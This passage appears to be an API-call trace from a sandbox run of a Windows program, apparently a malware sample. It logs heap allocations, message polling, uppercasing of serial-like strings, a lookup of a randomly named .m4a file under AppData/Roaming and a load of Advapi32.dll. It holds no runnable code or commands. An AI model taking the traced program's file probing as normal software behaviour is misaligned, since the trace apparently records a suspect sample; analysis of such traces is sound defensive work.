(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0150.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0150.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0150.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0150.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0150.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0150.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0150.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0150.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0150.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0150.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0150.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0150.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0150.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0150.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0150.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0150.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0150.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0150.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0150.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0150.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0150.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0150.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0150.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0150.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0150.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0150.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0150.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0150.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0150.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0150.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0150.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0150.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0150.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0150.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0150.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0150.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0150.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0150.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0150.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0150.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0150.981] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0150.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0150.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0150.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0150.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0150.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0150.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0150.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0150.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0150.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0150.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0150.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0150.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0150.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.982] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0150.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0150.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0150.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0150.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0150.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0150.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0150.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0150.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0150.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0150.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0150.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0150.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0150.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0150.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0150.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0150.983] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/SROlf 2S5m.m4a", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4894b540, ftCreationTime.dwHighDateTime=0x1d5cdce, ftLastAccessTime.dwLowDateTime=0x98776f80, ftLastAccessTime.dwHighDateTime=0x1d5c8ce, ftLastWriteTime.dwLowDateTime=0x98776f80, ftLastWriteTime.dwHighDateTime=0x1d5c8ce, nFileSizeHigh=0x0, nFileSizeLow=0x169ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="SROlf 2S5m.m4a", cAlternateFileName="SROLF2~1.M4A")) returned 0x9e1af8 [0150.984] FindClose (in: hFindFile=0x9e1af8 | out: hFindFile=0x9e1af8) returned 1 [0150.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0150.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0150.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0150.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0150.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0150.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0150.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0150.984] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0150.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0150.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0150.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0150.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0150.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0150.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0150.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0150.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0150.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0150.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0150.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0150.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0150.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0150.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0150.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0150.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0150.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0150.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0150.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0150.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0150.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0150.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0150.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0150.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0150.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0150.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0150.985] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0150.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0150.985] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0150.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0150.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.985] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.985] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0150.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0150.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0150.986] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0150.986] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.986] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0150.986] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0150.986] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.986] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0150.986] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0150.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.987] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0150.987] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0150.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.988] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.988] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.988] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.988] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0150.988] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.988] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0150.988] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) 